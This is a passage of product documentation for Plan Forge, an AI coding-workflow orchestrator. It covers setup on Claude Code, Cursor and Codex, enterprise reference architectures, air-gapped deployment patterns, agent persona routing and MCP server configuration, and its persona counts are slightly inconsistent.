Claude Code is Anthropic's terminal-native agentic coding environment. Of the three platforms covered in this section, it has the closest feature parity with GitHub Copilot for Plan Forge purposes, for two reasons: it supports MCP natively, and it reads AGENTS.md on every session start.

Setup for Claude Code

After running setup.sh (or setup.ps1), Plan Forge's MCP server is registered in .vscode/mcp.json. Claude Code reads MCP configuration from a separate file at ~/.claude/mcp.json (global) or .claude/mcp.json (per-project). Copy the Plan Forge entry across:

# Extract the Plan Forge MCP entry from VS Code's config and write it to Claude Code's config
pforge setup --agent claude

The --agent claude flag (available from setup.sh and setup.ps1) writes a Claude-compatible MCP config file at .claude/mcp.json alongside the standard VS Code config. Once the MCP server is registered, all 36 Plan Forge tools are available from Claude Code's chat interface.

What works on Claude Code

Feature	Status	Notes
`pforge run-plan` (CLI)	✓ full	Identical to Copilot, the CLI runs independently of the agent platform.
MCP tools in chat	✓ full	Run `pforge setup --agent claude` once to register the server.
`AGENTS.md` context	✓ full	Claude Code reads `AGENTS.md` natively on session start.
Instruction files (`.github/instructions/`)	✓ full	Referenced via prompt includes; Claude Code sees them through file read calls.
BYOK model selection	✓ full	Set `ANTHROPIC_API_KEY` in `.forge/secrets.json` or environment.
Copilot Coding Agent dispatch (`--worker copilot-coding-agent`)	✗ GitHub-only	Requires GitHub Copilot Coding Agent, which is a GitHub product. Not applicable when using Claude Code as the primary agent.
GHAS / CodeQL integration (`pforge plan-from-sarif`)	✓ full	SARIF parsing is CLI-only and works regardless of agent platform. The GHAS API calls require `gh` CLI and a GitHub-hosted repo.
Copilot Spaces sync (`pforge sync-spaces`)	✗ GitHub-only	Copilot Spaces is a GitHub product. Not applicable outside GitHub Copilot.

Invoking Plan Forge from Claude Code chat

With the MCP server registered, the full Plan Forge surface is available from Claude Code's chat:

"Call forge_run_plan on docs/plans/Phase-28-PLAN.md with quorum=auto and tell me the projected cost first."

Claude Code will call forge_estimate_quorum, present the cost breakdown, then, with confirmation, call forge_run_plan. The execution loop, trajectory capture, and dashboard updates all behave identically to a Copilot Chat invocation.

Cursor

Cursor is an AI-first code editor built on VS Code. It reads AGENTS.md as a cross-agent context document and supports MCP via the same .vscode/mcp.json that Plan Forge already writes. In most cases, Cursor requires no additional setup after setup.ps1 / setup.sh, the VS Code MCP config is the Cursor MCP config.

Cursor-specific context files

Cursor also reads its own rule files from .cursor/rules/. If your repo has a .cursor/rules/ directory, you can mirror the most critical Plan Forge instruction files there. Plan Forge does not write to .cursor/rules/ automatically, but the setup flag generates the directory with recommended stubs:

pforge setup --agent cursor

This creates .cursor/rules/plan-forge.mdc with a condensed version of the architecture principles, pipeline reference, and quick-command list, the subset most useful for inline suggestions and Agent mode. The file is a stub you can extend; Plan Forge does not overwrite it on subsequent pforge update runs.

What works on Cursor

Feature	Status	Notes
`pforge run-plan` (CLI)	✓ full	Run from Cursor's integrated terminal, identical to any terminal.
MCP tools in Agent mode	✓ full	Cursor reads `.vscode/mcp.json`, no extra config needed after `setup`.
`AGENTS.md` context	✓ full	Cursor reads `AGENTS.md` for cross-agent context.
Cursor rules (`.cursor/rules/`)	⚠ optional	Run `pforge setup --agent cursor` to generate stub rules. Not required but improves inline suggestion quality.
BYOK model selection	✓ full	Cursor has its own model picker; Plan Forge's `--model` flag is independent and applies to CLI/MCP invocations.
Copilot Coding Agent dispatch	✗ GitHub-only	Not applicable when using Cursor as the primary agent.
GHAS / CodeQL integration	✓ full	CLI-based; works from Cursor's terminal.
Copilot Spaces sync	✗ GitHub-only	Copilot Spaces is a GitHub product.

Cursor + Copilot combination: Many teams use Cursor as their primary editor while keeping GitHub Copilot active for PR reviews and the Copilot Chat panel. In this setup, Plan Forge serves both surfaces: Cursor gets MCP tools and .cursor/rules/ context, while Copilot gets instruction files and prompt files via the .github/ directory. Both share the same AGENTS.md and .vscode/mcp.json.

Codex

Codex is OpenAI's cloud-based coding agent. It operates as a sandboxed execution environment that clones your repository, reads AGENTS.md for context, executes tasks, and opens a PR with the results, a workflow that parallels GitHub Copilot Coding Agent's dispatch loop described in Section 3.

Setup for Codex

pforge setup --agent codex

The --agent codex flag ensures AGENTS.md is present and well-formed (Codex is strict about its format), and sets up the codex-setup-steps.yml file at .github/codex-setup-steps.yml if it does not already exist. The setup file tells Codex how to bootstrap the repo environment, install dependencies, set environment variables, run initial checks, before it begins executing tasks.

Dispatching to Codex

Codex does not support MCP, so it cannot call Plan Forge tools from chat. Instead, Plan Forge dispatches to Codex by writing the slice prompt into a task file and passing it through the Codex task interface. The equivalent of --worker copilot-coding-agent for Codex is:

pforge run-plan --worker codex docs/plans/my-feature-PLAN.md

This generates a task description for each slice (same structure as the Copilot Coding Agent issue body, minus the GitHub-issue wrapper), submits it to the Codex API, polls for the resulting PR, and captures the trajectory, identical to the Copilot Coding Agent dispatch loop except the delivery mechanism is the Codex API rather than the GitHub Issues API.

Prerequisites: the OPENAI_API_KEY must be set in .forge/secrets.json or as an environment variable, and the repo must be connected to the Codex environment (done once via pforge setup --agent codex).

What works on Codex

Feature	Status	Notes
`pforge run-plan` (CLI)	✓ full	CLI runs independently; identical behavior.
Cloud dispatch (`--worker codex`)	✓ full	Requires `OPENAI_API_KEY` and `pforge setup --agent codex`.
`AGENTS.md` context	✓ full	Codex reads `AGENTS.md` as its primary context document. Keep this file up to date with `pforge update`.
MCP tools in chat	✗ not supported	Codex does not support MCP today. Plan Forge tools are available only via `pforge run-plan` CLI and the Codex dispatch loop.
BYOK model selection	✓ full	Set `OPENAI_API_KEY`; use `--model gpt-5.4` etc.
GHAS / CodeQL integration	✓ full	CLI-based SARIF parsing works regardless of agent. GHAS API requires `gh` CLI and a GitHub-hosted repo.
Copilot Spaces sync	✗ GitHub-only	Copilot Spaces is a GitHub product.

Codex vs Copilot Coding Agent: choosing between dispatch workers: Both workers clone the repo, execute the slice, and open a PR. The practical difference is auth surface: --worker copilot-coding-agent requires a GitHub Copilot Coding Agent seat; --worker codex requires an OpenAI API key. If your org has both, prefer copilot-coding-agent for repos already on GitHub, the PR telemetry, trajectory capture, and Copilot Activity tab integration are deeper. Use --worker codex when the primary model preference is GPT-class and Copilot Coding Agent is not enabled at the org level.

Platform comparison at a glance

Feature	GitHub Copilot	Claude Code	Cursor	Codex
`pforge run-plan` CLI	✓	✓	✓	✓
MCP tools in chat	✓	✓	✓	✗
`AGENTS.md` context	✓	✓	✓	✓
Cloud dispatch worker	`copilot-coding-agent`	—	—	`codex`
GHAS / SARIF integration	✓	✓	✓	✓
Copilot Spaces sync	✓	✗	✗	✗
GitHub Metrics API leaderboard	✓	⚠ CLI pull only	⚠ CLI pull only	⚠ CLI pull only
One-step setup	`setup.sh`	`setup.sh --agent claude`	`setup.sh --agent cursor`	`setup.sh --agent codex`

Reading the table: ✓ = works fully; ⚠ = works with one extra step or reduced depth; ✗ = not available on this platform. No row marked ✗ prevents pforge run-plan from executing end-to-end.

9. Built with Plan Forge

This chapter was written by Plan Forge. Sections 1, 3, 4, 5, 6, 7, and 8 were drafted by pforge run-plan dispatching to GitHub Copilot via the gh-copilot worker. Each section is a captured slice trajectory you can audit.

Section 9 itself, the artifact you're reading now, is the dogfood of the dogfood: a single live --worker copilot-coding-agent dispatch against this same repository, captured at runtime.

Captured runs

Section	Plan	Worker	Cost	Trajectory
1, 2 (readiness + 8 primitives)	Phase GITHUB-A plan on GitHub	Manual (small surface)	$0.00	`d7e9cf8`
3, 4 (Coding Agent + GHAS)	Phase GITHUB-B plan on GitHub	`gh-copilot` worker	$0.07	`fb39b4d` + 9 slice commits
6 (Metrics API)	Phase GITHUB-D plan on GitHub	`gh-copilot` worker	$0.04	`28fe1ef` + 7 slice commits
5, 7, 8 (Spaces + BYOK + other agents)	Phase GITHUB-C plan on GitHub	`gh-copilot` worker	$0.05	`7e14d34` + 4 slice commits
9 (this section)	Dogfood plan on GitHub (per runbook on GitHub)	copilot-coding-agent worker (real dispatch)	$0.01	Issue #150 + `bb56040`

Total spend to write this chapter: $0.17 across the worker-executed slices listed above. The dispatch pipeline for --worker copilot-coding-agent is verified end-to-end against this repo; once Copilot Coding Agent is enabled at the repo level, re-running the dogfood plan should round-trip a full Issue → PR → merge cycle in a single command.

Using Spec Kit with this repo? Plan Forge can auto-import your spec.md, plan.md, tasks.md, and constitution.md directly into a Crucible smelt, no re-specifying needed.

See the Spec Kit Interop chapter for the complete field-mapping reference, import procedure, and ecosystem extension details.

A glowing golden compass rose floating above the anvil, with six radiating beams ending in icons for the six enterprise concerns: network, architecture, calendar, security shield, audit ledger, deployment rocket

Appendix J

Plan Forge for Enterprise

The landing page for enterprise evaluators, reference architecture, GitHub stack alignment, operator playbook, compliance reference, and the map of where to find every enterprise answer.

Audience: Platform leads, security architects, and engineering managers evaluating Plan Forge for multi-team deployment in regulated or large-scale environments.

TL;DR: Plan Forge is the open-source AI-SDLC orchestrator for teams whose code lives on GitHub. It is local-first by design (no Plan Forge SaaS plane), composes cleanly with Microsoft Foundry and other enterprise model gateways, and ships the orchestration layer GitHub explicitly leaves to the ecosystem.

Why Plan Forge for the enterprise

Most "AI-SDLC" tools today are point solutions: a code completion in the IDE, an autonomous agent that opens one PR, a code reviewer that comments on PRs. Plan Forge is the layer above those, a plan-driven, gate-enforced, cost-tracked, multi-slice orchestration framework that turns a feature spec into a series of validated commits.

Three structural choices make it enterprise-fit:

Local-first / air-gappable control plane. The orchestrator runs on the developer's box or a CI runner. There is no Plan Forge SaaS service. Source code does not leave the customer's network unless the customer chooses to call a hosted LLM (and even then, all logging stays local). This is a structural difference from Cursor (workers can run on-prem but the control plane is in AWS) and Sourcegraph Amp (cloud-only, no self-host, no BYOK).
GitHub-native by design, not by integration. Plans, slices, and validation gates compose with GitHub Issues, Copilot Cloud Agent, Actions, AGENTS.md, and the GitHub MCP server. The architecture extends GitHub primitives in the direction GitHub has signaled (via the Copilot SDK preview and AGENTS.md/MCP/Skills as Linux Foundation standards) is the ecosystem's lane.
Open standards throughout. AGENTS.md, MCP, Agent Skills, and OpenTelemetry gen_ai.* semantic conventions are first-class. No proprietary file formats, no vendor lock-in, no "you must use our cloud."

Where to find what you need

This page is a map. Each link goes to the document that answers a specific enterprise concern.

Architecture and reference deployments

You're asking	Read
What does a 5-team Plan Forge deployment look like?	Reference Architecture
How does Plan Forge compose with Microsoft Foundry / Azure OpenAI in our tenant?	Reference Architecture — Microsoft-shop variant
How does Plan Forge align with the GitHub stack we already pay for?	GitHub Stack Alignment (Appendix H), and the deeper Plan Forge on the GitHub Stack (Appendix I)
How do we onboard 12 squad members on Day 1?	Agent Factory Recipe

Operations

You're asking	Read
What does Day 1 / Week 4 / Week 12 look like for a team adopting Plan Forge?	Fleet Operator Playbook
How do we run Plan Forge across N teams with shared visibility?	Fleet Operator Playbook — Multi-Team
What metrics should we track?	Fleet Operator Playbook — KPIs

Security, compliance, data residency

You're asking	Read
What gets logged, where, in what format, and how do we export it for audit?	Compliance and Data Residency
Where does our source code go when we run Plan Forge?	Compliance — Data Flow
Can we run Plan Forge fully air-gapped?	Compliance — Air-Gapped
Does Plan Forge work with Azure Government?	Compliance — Azure Government
What about HIPAA, FedRAMP, SOC2, PCI?	Compliance — Compliance Posture

Identity, auth, RBAC

You're asking	Read
How does authentication work today?	Compliance — Identity
What's the roadmap for Entra ID / SAML / SCIM?	Compliance — Roadmap

Telemetry and observability

You're asking	Read
Can we ship Plan Forge traces to Splunk / Datadog / Application Insights?	Compliance — Observability Export

Cost and budgeting

You're asking	Read
How do we estimate cost for a plan before running it?	Fleet Operator Playbook — Cost Discipline
How do we attribute cost to teams and engineers?	Fleet Operator Playbook — Cost Attribution

What Plan Forge is not

We are deliberate about lanes. Plan Forge is not:

An IDE replacement. Cursor, Windsurf, VS Code Copilot Chat all do that better. Plan Forge sits above the IDE.
An LLM provider. Plan Forge talks to Anthropic, OpenAI, xAI, GitHub Copilot, Microsoft Foundry. Pick yours.
A first-party agent runtime in the Foundry/Agent-Service sense. Plan Forge orchestrates the SDLC; Microsoft Agent Framework and Foundry Agent Service are the agent runtime layer one altitude below.
A SaaS product. There is no Plan Forge cloud. The dashboard runs on localhost:3100. Customers own their deployment top to bottom.

Quick start for evaluators

If you have 30 minutes:

Read Reference Architecture for the picture.
Read GitHub Stack Alignment for the why.
Skim Compliance and Data Residency, Sections 1–3 cover 80% of typical security review questions.

If you have 90 minutes:

Read Fleet Operator Playbook, gives you a calendar, not a feature list.
Read Agent Factory Recipe, the concrete onboarding pattern.

If you want to run it:

Follow the Quickstart walkthrough, then return here for the multi-team patterns.

Engineering principles that make this work

Plan Forge is built on five non-negotiables that show up in every layer:

Architecture-first: every change asks five questions before code is written (see .github/instructions/architecture-principles.instructions.md)
Separation of concerns: orchestrator → worker → repository → presentation, never collapsed
Test-driven for business logic: Red → Green → Refactor
Type safety: explicit types at every boundary
Open standards: AGENTS.md, MCP, Skills, OTel gen_ai.*, adopt, don't invent

Customers can read the same instruction files Plan Forge agents read. Nothing is hidden. The framework is the documentation.

Support model

Plan Forge is open source (MIT). Support model is honest:

Issues on GitHub for bugs and feature requests
GitHub Discussions for usage questions
Self-repair tooling built in, forge_meta_bug_file lets agents file defects against Plan Forge itself when they encounter them, and the project is dogfooded against itself
No commercial support tier today. This may change. When it does, the open-source core stays open source.

For enterprises that need a commercial relationship, the right pattern today is to use Plan Forge directly and engage your usual platform-services partner (Microsoft FDE, Slalom, Accenture, etc.) for integration work.

An architectural blueprint scroll on the workbench drawing itself into a 5-layer stacked tower of glowing translucent rectangles, anchored at the anvil base, with Azure-blue accents suggesting a cloud tenant boundary

Appendix K

Enterprise Reference Architecture

One canonical architecture for a 5-team / 1000-developer fleet, plus the Microsoft Foundry composition variant for Azure-tenant deployments.

Audience: Platform architects and security engineers planning a multi-team Plan Forge deployment.

Scope: Generic enterprise architecture (Pattern A) and the Microsoft Foundry composition variant (Pattern B). Plus three network/isolation patterns including the air-gapped option that's a structural differentiator.

Design principles

Three constraints shape every architecture below:

Local-first control plane. The Plan Forge orchestrator runs on the developer's box or a CI runner. There is no Plan Forge SaaS service. Source code does not leave the customer's network unless the customer chooses to call a hosted LLM.
GitHub-native by design. Plan Forge consumes GitHub Issues, Copilot Cloud Agent, Actions, AGENTS.md, MCP, and the github-mcp-server as its substrate. Reinforces a GitHub Enterprise + Copilot Enterprise consolidation rather than competing with it.
Open standards throughout. AGENTS.md (Linux Foundation), MCP (Linux Foundation), Agent Skills (Apache 2.0, Anthropic-maintained), OpenTelemetry gen_ai.* semantic conventions. No proprietary file formats.

Reference architecture A — Generic enterprise (5 teams, 1000 developers)

Generic 5-team enterprise reference architecture: developer workstations → GitHub Enterprise → CI/fleet execution → observability → LLM provider, all within the customer's network boundary. — Generic enterprise reference architecture, 5 teams × ~200 developers. Plan Forge orchestrator runs in the customer's network; only LLM inference may cross the boundary depending on provider choice.

Component responsibilities

Component	Owns	Does not own
Developer workstation	Local plan execution, IDE-time orchestration, the dashboard, all `.forge/` artifacts	Multi-team aggregation, long-running compute
GitHub Enterprise	Source of truth for repos, issues, PRs. Hosts Copilot Cloud Agent runs. Runs Actions workflows	Plan-level orchestration. Quality / eval / drift detection
Actions runners	Long-running plan execution, scheduled `pforge run-plan` jobs, fleet-scale dispatch	Interactive developer-loop workflows
OTel collector + backend	All trace, metric, and log aggregation across teams	Real-time agent control
LLM provider	Inference for worker LLM calls	Plan state, scope enforcement, gate validation

Data flow

Developer (or CI) starts a plan run.
Plan Forge orchestrator reads the plan file, builds the slice DAG, dispatches each slice to the configured worker (Copilot Cloud Agent for GitHub-native runs, Claude Code / Codex CLI for direct runs, etc.).
Worker consumes AGENTS.md + plan slice context + MCP tools. Calls the configured LLM provider for completions.
Plan Forge runs the slice's validation gate. On pass, advances. On fail, retries with reflexion or escalates per plan policy.
Cost, trace, and event data is appended to .forge/runs/<id>/ locally and emitted to the OTel collector for fleet aggregation.
PR is opened (Cloud Agent path) or commit is staged (direct path). Plan-aware diff (pforge diff) checks scope-contract adherence before merge.

Reference architecture B — Microsoft Foundry variant

For customers running on Microsoft Foundry (Azure OpenAI, Foundry Agent Service, Foundry Toolboxes), Plan Forge composes as the SDLC orchestrator layer above Foundry's model gateway and agent runtime.

Microsoft Foundry composition variant. Plan Forge sits above Foundry as the SDLC orchestrator; Foundry sits below as model gateway and production agent runtime.

What sits where

Plan Forge above Foundry: Plan Forge is the SDLC orchestrator (specify, plan, harden, execute, validate, ship). Foundry is the model gateway and production agent runtime. Plan Forge is not inside Foundry, not beside Foundry as a peer agent product, but above Foundry as the higher-altitude orchestration layer.
Foundry as model provider: Plan Forge talks to AOAI via the OpenAI-compatible endpoint https://{resource}.openai.azure.com/openai/v1/. Auth via Entra ID (recommended), API key, or managed identity. Customer configures deployment names, not model families.
Foundry Toolbox as shared MCP surface: Customer's curated, governed, audited tool surface, exposed once via Foundry Toolbox, consumed by Plan Forge in worker sessions and by Foundry agents in production. Single source of truth for org tools.
App Insights as OTel sink: Plan Forge emits OTel traces (per the gen_ai.* spec). Pointed at the Foundry-attached Application Insights resource, Plan Forge runs show up in the same dashboards as Foundry agent runs.
Plan Forge generates code that deploys to Foundry: A Plan Forge plan can ship a feature that is a Foundry agent. deploy.instructions.md and the skill system include /staging-deploy and similar skills that target Foundry deployment paths.

What does not compose

Plan Forge workers do not run as Foundry hosted agents. Different lifetimes, different IO models. Plan Forge workers need filesystem/git/terminal; Foundry hosted agents are containerized with VM-isolated sandboxes per session.
Plan Forge does not register itself as a Foundry "fleet view" entity. Integration is one-way (Plan Forge writes to App Insights); the single pane of glass for Plan Forge runs is the Plan Forge dashboard.

Auth flow (Entra recommended)

from azure.identity import DefaultAzureCredential, get_bearer_token_provider
token_provider = get_bearer_token_provider(
    DefaultAzureCredential(), "https://ai.azure.com/.default"
)
client = OpenAI(
    base_url="https://YOUR-RESOURCE.openai.azure.com/openai/v1/",
    api_key=token_provider,
)

Required role assignment on the Foundry resource: Cognitive Services OpenAI User or Contributor.

Friction to design around

Deployment-name vs model-name: Customer says "I'm using gpt-5.4-mini"; Plan Forge needs the deployment name (e.g., eastus-prod-mini).
AOAI quota differs from OpenAI: Fixed TPM quotas per region per model, plus PTU for provisioned. A slice estimating 150K tokens against a 100K TPM deployment will throttle mid-run. Plan ahead.
Government cloud: Azure Gov has a reduced model catalog (gpt-5.1, gpt-4.1 family, o3-mini, gpt-4o). Use the power-gov quorum preset (or graceful fallback) when targeting Azure Government.

Network and isolation patterns

Pattern 1: Fully cloud-LLM (typical SaaS company)

LLM calls go to public Anthropic / OpenAI / GitHub Copilot endpoints
Plan Forge runs locally, traces go to cloud-hosted observability
Lowest cost, fastest setup, weakest isolation
Right for: most non-regulated companies, internal tooling, dev productivity

Pattern 2: Hybrid (Microsoft-shop typical)

LLM calls go to Azure OpenAI in customer's tenant via private endpoint
Plan Forge runs locally and in customer's Azure DevOps / GitHub Actions
Traces to App Insights in same Azure subscription
Right for: regulated SaaS, fintech, healthtech with Microsoft preference

Pattern 3: Air-gapped (defense, sovereign cloud, regulated)

LLM calls go to on-prem inference (Foundry Local powered by Azure Local, Ollama, vLLM, or similar)
Plan Forge runs entirely in-network; no calls leave the boundary
OTel collector + backend in-network
GitHub Enterprise Server (GHES) instead of cloud
Right for: defense, FedRAMP High, IL5/IL6, sovereign cloud customers

Plan Forge is structurally compatible with all three. Pattern 3 is the differentiator, Cursor cannot offer this (control plane in AWS), Sourcegraph Amp explicitly cannot (no self-host, no BYOK), GitHub Copilot Cloud Agent runs on GitHub-hosted infrastructure. For air-gapped requirements, Plan Forge is structurally the only viable option in the comparison set.

Capacity planning

Per-team sizing (typical)

For a team of ~50 developers running ~3 plans/day per developer:

Resource	Estimate
Plan Forge orchestrator processes	One per active developer, low CPU/memory (Node.js process, dashboard at :3100)
GitHub Actions minutes (CCA-dispatched plans)	~15K min/month (varies wildly by plan complexity)
LLM tokens (mixed-mode quorum)	~50M input + 10M output per team-month at moderate use
Storage (`.forge/runs/` retention)	~5GB / team / quarter at typical detail
OTel trace volume	~100K spans / team / day

Org-level governance

Custom properties on repos to scope which Plan Forge plans are allowed
Org runner policies to control which Cloud Agent runners are available
Branch protection rules to require Plan Forge gate-passed status before merge
Cost budgets in .forge.json per repo or per team

Failure modes and mitigations

Failure	Detection	Mitigation
LLM provider outage	OTel error rate spike on `gen_ai.*` spans	Plan Forge supports multi-provider routing in `.forge.json`. Failover order configurable per slice
AOAI quota exhausted mid-slice	Worker error, gate failure	Preflight quota check (planned), slice retry with backoff, cross-region failover via deployment alias
GitHub Actions runner exhaustion	Workflow queue depth, Cloud Agent session pending	Self-hosted runner pool, prioritize critical plans via `[P]` tag and runner labels
Plan drift (PR diverges from approved plan)	`pforge diff` post-execution	Pre-merge gate fails; reviewer-gate agent flags; review thread opened via `forge_review_add`
Cost runaway (slice loops or model misroutes)	`forge_cost_report` anomaly, dashboard cost-tile alert	Per-slice `workerTimeoutMs` cap, `forge_alert_triage` priority queue, in-loop stuck detector (planned)

Reference deployment timeline

For an enterprise rolling out across 5 teams in 90 days:

Week	Milestone
0	Stakeholder alignment, pick LLM provider strategy, identify pilot team
1–2	Pilot team installs Plan Forge, runs first plan against a known-easy feature, baseline cost + cycle time
3–4	Pilot team runs 5+ plans, refines instruction files, captures lessons
5–6	Add team 2 + team 3 in parallel; first multi-team observability dashboards
7–8	Add teams 4 + 5; introduce shared MCP server (Foundry Toolbox or in-house equivalent)
9–10	Org-wide rollout patterns formalized; cost guardrails; quality KPIs reported up
11–12	First quarterly review; eval data informs next-quarter planning

See Appendix M — Fleet Operator Playbook for week-by-week specifics.

Twelve glowing humanoid silhouettes of varied specialist roles arranged in a semicircle around the anvil, each with a different colored aura (security blue, performance red, architecture green); a glowing recipe scroll at the center on the anvil

Appendix L

Agent Factory Recipe

Get a fleet of specialized agents productive on Day 1, not Day 90. A repeatable 7-step recipe.

Audience: Platform leads onboarding 12+ "Virtual Squad" agent personas across product teams in the first weeks of a Plan Forge rollout.

Goal: One work day for the first squad, one hour per additional squad thereafter.

What "Agent Factory" means in Plan Forge

Plan Forge ships 12 agent personas out of the box (6 stack-specific + 7 cross-stack + 5 pipeline + 1 audit-classifier). Each is a Markdown file under .github/agents/ with a YAML frontmatter description and a body that defines the persona's expertise, tone, and lane. Agents are invoked from chat (agent picker dropdown) or referenced from a plan slice (agent: security-reviewer). They cannot edit files, they audit and report.

The "Agent Factory" is the configuration plus convention layer that makes those 20 personas productive against a customer's specific stack on Day 1, instead of generic-but-vague.

The recipe in one page

1. SUBSTRATE    , confirm GitHub-native primitives are in place
2. CONFIGURE    , write project profile + project principles (one hour each)
3. ROUTE        , assign agents to lanes (which agents own which kinds of work)
4. SHARED CONTEXT, populate AGENTS.md, copilot-instructions.md, instruction files
5. SHARED TOOLS , point at MCP servers (Plan Forge MCP, github-mcp-server, optional Foundry Toolbox)
6. PILOT        , run one real plan with the full agent fleet, capture friction
7. ITERATE      , encode lessons in instruction files; re-run

Each step below is one to two hours for a platform lead familiar with the codebase. The whole recipe is achievable in one work day for the first squad and replicates in one hour per additional squad thereafter.

Step 1 — Substrate check (15 min)

Verify the GitHub-native primitives Plan Forge depends on are enabled in the org:

Primitive	Check	If missing
GitHub Copilot Enterprise	Org admin → Copilot tab → "Copilot Enterprise" enabled	Provision before continuing
Copilot Cloud Agent	Org admin → Copilot tab → Cloud Agent toggle ON for target repos (or via custom properties)	Enable per GitHub docs
GitHub Actions enabled per repo	Repo settings → Actions → "Allow all actions" or specific allowlist	Enable per repo
MCP support in IDE	VS Code 1.95+ with `chat.mcp.enabled` setting on, or Copilot CLI 1.x	Update IDE / install CLI
AGENTS.md aware tooling	At least one of: Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf	Pick at least one, they're Plan Forge's worker options for non-CCA paths

If any are missing, fix before moving on. The factory recipe assumes the substrate is in place.

Step 2 — Configure project profile and principles (2 hr)

Plan Forge ships two prompts that, run once, produce the configuration that downstream agents inherit:

`project-profile.prompt.md` — what your stack is

A guided interview that produces .github/instructions/project-profile.instructions.md. Captures:

Languages, frameworks, ORM, test framework
Build / test / lint / dev commands
Compliance frameworks (SOC2, HIPAA, PCI-DSS, GDPR, FedRAMP)
Coding standards (naming, file organization, import ordering)
Database conventions, API patterns, error handling preferences

This file auto-loads (via applyTo: '**' in frontmatter) for every agent session in the repo. Run it once per repo. It's the foundation everything else assumes.

`project-principles.prompt.md` — what your team commits to

A second interview that produces docs/plans/PROJECT-PRINCIPLES.md plus a companion .github/instructions/project-principles.instructions.md. Captures:

Architectural commitments (what you will and won't build)
Forbidden patterns (anti-patterns specific to your codebase)
Boundaries (what's in scope for AI-driven work, what isn't)

This file is loaded by the SessionStart hook and pinned in agent context for the duration of every session.

Why both

Profile = facts about the stack. Principles = commitments about how the team works. Confusing the two is a common mistake. Profile is descriptive; principles is prescriptive. Both feed every agent every session.

Step 3 — Route agents to lanes (30 min)

Plan Forge ships these 20 personas. Decide who owns what for your team:

Stack-specific reviewers (6)

Agent	Owns
`architecture-reviewer`	Layer separation, pattern adherence, refactor proposals
`database-reviewer`	Schema, migrations, query performance, ORM patterns
`deploy-reviewer`	Dockerfiles, CI/CD config, deployment scripts
`performance-reviewer`	Hot/cold path analysis, allocation, profiling
`security-reviewer`	Input validation, secret handling, OWASP, auth
`test-runner`	Test coverage, test quality, fixture sanity

Cross-stack reviewers (7)

Agent	Owns
`api-contracts-reviewer`	OpenAPI consistency, breaking change detection
`accessibility-reviewer`	WCAG, ARIA, keyboard navigation
`multi-tenancy-reviewer`	Tenant isolation, row-level security, cross-tenant query risk
`ci-cd-reviewer`	Pipeline correctness, runner sanity, gate completeness
`observability-reviewer`	Trace coverage, log quality, metric meaningfulness
`dependency-reviewer`	Vulnerability scanning, license compliance, version hygiene
`compliance-reviewer`	GDPR / CCPA / SOC2 / HIPAA / PCI-DSS conformance

Pipeline agents (5) — these have handoff buttons

Agent	Stage
`specifier`	Step 0: define what & why
`plan-hardener`	Step 2: harden plan into execution contract
`executor`	Step 3: execute slices with validation gates
`reviewer-gate`	Step 5: independent review and drift detection
`shipper`	Step 6: commit, deploy, close

Step 1 (preflight) ships as a prompt, not an agent, see .github/prompts/step1-preflight-check.prompt.md. It runs inline rather than as a separate persona.

Audit / classifier (1)

Agent	Role
`audit-classifier-reviewer`	Reviews changes to the audit classifier itself; enforces before/after finding counts

Routing decisions to make

For each agent, pick:

Owner, which team member (or rotation) is the human reviewer when this agent fires?
Trigger, automatic on PR? Manual via slash command? Plan-slice-bound?
Authority, advisory (commenter), gating (blocks merge), or escalation-only (raises an issue)?

Document the routing in .github/agents/ROUTING.md (you may need to create this, it's not yet a Plan Forge default but the convention is clean and we recommend adopting it).

Step 4 — Shared context: AGENTS.md and instruction files (2 hr)

Plan Forge generates these on setup.ps1 / setup.sh. The factory step is to populate them with project-specific content beyond the templated defaults.

`AGENTS.md` (repo root)

The Linux Foundation-stewarded standard read by Claude Code, Cursor, Codex, Amp, Aider, Gemini CLI, Goose, Windsurf, and others. Contents:

Project overview (one paragraph)
Build / test / lint / dev commands (the substantive ones, not generic placeholders)
Code style conventions
Testing conventions
Security considerations
PR conventions

Plan Forge keeps this in sync with the project-profile output, but review the generated content, generic phrasing here costs you on every agent run.

`.github/copilot-instructions.md`

The GitHub-native equivalent. Contains:

Architecture principles link
Quick commands
Coding standards summary
Pipeline overview
Skill / agent / hook references

Plan Forge generates a strong default. Customize the "Project Overview" section with your team's specifics.

`.github/instructions/*.instructions.md`

Plan Forge ships 18 of these per preset (the dotnet/typescript/python/etc. preset directories under presets/, each with its own .github/instructions/). Each has an applyTo glob that controls when it auto-loads:

File	Loads on
`architecture-principles.instructions.md`	`**` (always, universal baseline)
`project-profile.instructions.md`	`**` (always, your stack)
`project-principles.instructions.md`	`**` if `PROJECT-PRINCIPLES.md` exists
`git-workflow.instructions.md`	`**`
`api-patterns.instructions.md`	`**`
`auth.instructions.md`	`**`
`database.instructions.md`	`**`
`security.instructions.md`	`**`
`testing.instructions.md`	`**`
`errorhandling.instructions.md`	`**`
`deploy.instructions.md`	`**`
`observability.instructions.md`	`**`
`caching.instructions.md`	`**`
`messaging.instructions.md`	`**`
`multi-environment.instructions.md`	`**`
`performance.instructions.md`	`**`
`version.instructions.md`	`**`
`status-reporting.instructions.md`	`docs/plans/`, `pforge-mcp/`, `.forge/**`
`context-fuel.instructions.md`	`**`
`self-repair-reporting.instructions.md`	`**`

These are templated. Read each one. Add team-specific guidance where the template is generic.

Step 5 — Shared tools: MCP server selection (30 min)

Configure .vscode/mcp.json (Plan Forge generates this; you augment) with the MCP servers the fleet should share:

Required

{
  "mcpServers": {
    "plan-forge": {
      "command": "node",
      "args": ["./pforge-mcp/server.mjs"]
    }
  }
}

Strongly recommended

{
  "github": {
    "url": "https://api.githubcopilot.com/mcp/",
    "auth": "oauth"
  }
}

The github-mcp-server gives every agent in the fleet first-class access to GitHub Issues, PRs, repos, code-scanning alerts, and 19 other toolsets. 29.5k stars, MIT, official.

For Microsoft-shop fleets

{
  "foundry-toolbox": {
    "url": "https://YOUR-FOUNDRY-TOOLBOX-ENDPOINT/mcp",
    "auth": {
      "type": "bearer",
      "tokenSource": "azure-keyvault://your-vault/foundry-toolbox-pat"
    }
  }
}

Foundry Toolboxes are MCP-compatible endpoints that bundle Web Search, Code Interpreter, File Search, Azure AI Search, OpenAPI tools, and Agent-to-Agent connections behind a single endpoint with versioning, auth, and policy enforcement. Single source of truth for the org's tools, consumed identically by Plan Forge agents in worker sessions and by Foundry agents in production.

For Azure DevOps shops

{
  "azure-devops": {
    "url": "https://YOUR-FOUNDRY-CATALOG/mcp/azuredevops",
    "auth": "oauth"
  }
}

Microsoft ships an Azure DevOps MCP Server (preview) as a Foundry catalog entry.

